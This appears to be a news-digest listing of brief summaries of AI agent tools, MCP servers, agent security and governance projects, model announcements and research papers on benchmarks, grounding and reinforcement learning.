LangChain: The Agent Engineering Platform for LLM Applications
LangChain is an open-source Python framework designed for building and deploying LLM-powered applications and agents. It provides tools for chaining interoperable components, integrating with various data sources and models, and supporting rapid prototyping and production-ready features like monitoring and debugging.
Origin: A Local-First Rust Daemon for AI Agent Memory and Context Management
Origin is a local-first Rust daemon designed to manage AI agent memory and context. It features Git-versioned memories, distilled wiki pages, and supports sessions for various AI clients like Claude Code, Cursor, and Codex, aiming to provide persistent context across AI workflows.
CUA: Open-Source Infrastructure for Desktop-Controlling AI Agents
CUA is an open-source project providing infrastructure for developing, training, and evaluating AI agents capable of controlling full desktop environments across macOS, Linux, and Windows. It includes sandboxes, SDKs, and benchmarks to facilitate the creation of computer-use agents.
Boxlite: A Compute Substrate for AI Agents
Boxlite is a new compute substrate designed for AI agents. It aims to be lightweight for local development and scalable for cloud deployment, offering a flexible environment for building and running AI agents.
Wide-Moat's Open-Source MCP Server for LLM-Powered Computing
Wide-Moat has released an open-source MCP server designed to provide Large Language Models (LLMs) with their own managed computing environments. This self-hosted solution offers Docker workspaces with integrated browser, terminal, and code execution capabilities, enabling LLMs to perform complex tasks autonomously.
Cordum: Open Agent Control Plane for Governing Autonomous AI Agents
Cordum introduces an open-source agent control plane designed to govern autonomous AI agents. It provides features for pre-execution policy enforcement, approval gates, and audit trails, aiming to enhance the safety and manageability of AI agent deployments.
Notion MCP Server: Integrating AI Agents with Notion
A new open-source project, the Notion MCP Server, enables AI agents to interact with Notion data. It supports various AI models and allows access to Notion pages, databases, and files.
Google's ADK-Python: An Open-Source Toolkit for AI Agent Development
Google has released ADK-Python, an open-source, code-first Python toolkit designed for building, evaluating, and deploying AI agents. The toolkit, currently at version 2.1.0, emphasizes flexibility and control in agent development and includes a graph-based execution engine for workflows and a structured Task API for agent-to-agent delegation.
Hermes Katana: A Defense-in-Depth Security Toolkit for LLM Agents
Hermes Katana is a Python-based security toolkit designed for LLM agents, offering defense-in-depth capabilities including taint tracking, a proxy secret guard, a policy engine, and red-team benchmarking. It aims to protect AI agents from various attacks like prompt injection and unauthorized command execution.
wshobson/agents: A Multi-Harness Agentic Plugin Marketplace for AI Code Assistants
The wshobson/agents GitHub repository presents a multi-harness agentic plugin marketplace designed for various AI code assistants, including Claude Code, Codex CLI, Cursor, OpenCode, and Gemini CLI. It offers a collection of plugins, agents, skills, and commands from a single Markdown source, generating native artifacts for each supported harness.
AI-Powered CesiumJS 3D Globe Control with Model Context Protocol
A GitHub project, cesium-mcp, offers AI-powered control for CesiumJS 3D globes. It utilizes the Model Context Protocol (MCP) to enable natural language commands for managing camera, entities, layers, animation, and spatial analysis within 3D GIS environments.
Swarm Orchestrator v10.0.0: AI-Generated PR Audit and Merge Gate
Swarm Orchestrator v10.0.0 introduces `swarm audit`, a new subcommand and GitHub Action designed to audit pull-request diffs for ten categories of AI-coding-agent 'cheat patterns'. It can block merges if blocking findings are detected and generates hash-chained audit ledgers and AI-BOM artifacts.
Mitigating Perceptual Judgment Bias in Multimodal LLM-as-a-Judge
Researchers have identified and analyzed "Perceptual Judgment Bias" in multimodal large language models (MLLMs) when used as evaluators. This bias causes MLLMs to prioritize plausible textual narratives over perceptually accurate visual evidence. To address this, they introduced the Perceptually Perturbed Judgment Dataset and a unified training framework combining GRPO-based rewards with a batch-ranking objective, aiming to improve perceptual fidelity and alignment with human evaluation.
LocateAnything: Fast and High-Quality Vision-Language Grounding with Parallel Box Decoding
LocateAnything is a new framework for vision-language grounding and detection that uses Parallel Box Decoding (PBD) to improve both speed and accuracy. Unlike traditional methods that decode 2D boxes token by token, PBD decodes geometric elements as atomic units in a single step, enhancing parallelism and preserving geometric coherence. The framework is supported by LocateAnything-Data, a large dataset with over 138 million training samples.
Anthropic Announces Claude Fable 5
Anthropic announced Claude Fable 5 alongside Claude Mythos 5 with expanded capabilities for coding, knowledge-intensive tasks, and practical developer workflows. The announcement is also reflected in the OpenRouter model listing, reinforcing that the model is now visible across broader distribution surfaces. This launch indicates a continuation of rapid model iteration focused on production-grade AI application support.
NewtPhys: A New Benchmark for Newtonian Physics Understanding in Foundation Models
Researchers have introduced NewtPhys, a 4D physically annotated dataset designed to evaluate foundation models' understanding of low-level Newtonian physics. The dataset, built from multiview images of real-world scenes with physics-grounded simulations, provides detailed annotations including 3D forces and per-pixel quantities. Initial evaluations using NewtPhys on 56 Vision-Language Models (VLMs) and 10 Vision Foundation Models (VFMs) revealed limitations in their physics reasoning capabilities.
SpatialBench: A New Benchmark for Spatial Foundation Models
Researchers have introduced SpatialBench, a new benchmark designed to holistically assess the generalization capabilities of spatial foundation models across diverse tasks, viewpoints, scene domains, and input densities. The benchmark evaluates 41 models across 19 datasets and 546 scenes, revealing that current models are not yet "all-round players" and highlighting the importance of domain alignment and data quality over simple dataset scaling.
SOCO: A New Benchmark for Semantic Object Correspondence in Vision Foundation Models
Researchers have introduced SOCO, a new benchmark designed to evaluate Semantic Object Correspondence (SC) in vision foundation models and large vision-language models (LVLMs). SOCO provides a taxonomy of correspondence types and over 1 million keypoint annotations across 100 categories, including language descriptions for part-level understanding.
Cohere Introduces North Mini Code: A New Model Tailored for Developers
Cohere has announced North Mini Code, its first model specifically designed for developers. This new model aims to provide enhanced capabilities for coding tasks and development workflows.
MemoryVLA++: Enhancing Vision-Language-Action Models with Temporal Memory and Imagination for Robotics
Researchers have introduced MemoryVLA++, a framework designed to improve Vision-Language-Action (VLA) models for robotic manipulation by incorporating temporal modeling. This approach equips VLA models with mechanisms for memory and imagination, inspired by cognitive science, to better handle long-horizon and temporally dependent tasks.
OpenAI Proposes Industrial Policy for the AI Era
OpenAI has published a paper outlining ambitious, people-first industrial policy ideas for the age of advanced artificial intelligence. The proposals focus on expanding opportunities, sharing prosperity, and building resilient institutions.
PAR3D: A Unified 3D-MLLM for Part-Aware Scene Understanding
Researchers have introduced PAR3D, a unified 3D Multimodal Large Language Model (3D-MLLM) framework designed to enhance 3D scene understanding by focusing on fine-grained part structures in addition to objects. This approach aims to improve embodied interaction with 3D environments.
Causally Evaluating the Learnability of Formal Language Tasks
Researchers propose a new methodology for evaluating the learnability of tasks in language models, moving beyond standard correlational analysis. By using formal languages derived from probabilistic finite automata, they introduce the 'binning semiring' to causally control data frequency and measure learnability. This approach aims to address the inherent flaws in correlational evaluations, which can lead to incorrect conclusions.
DistIL: Reinforcement Learning from Rich Feedback with Distributional DAgger
Researchers have introduced DistIL, a new approach to reinforcement learning that leverages rich feedback beyond simple binary rewards. DistIL uses a distributional variant of the DAgger imitation learning algorithm with a forward cross-entropy objective, which allows for more effective credit assignment and guarantees monotonic policy improvement. This method has shown empirical improvements over traditional RL from verifiable rewards (RLVR) and self-distillation baselines in tasks like scientific reasoning, coding, and complex mathematical problem-solving.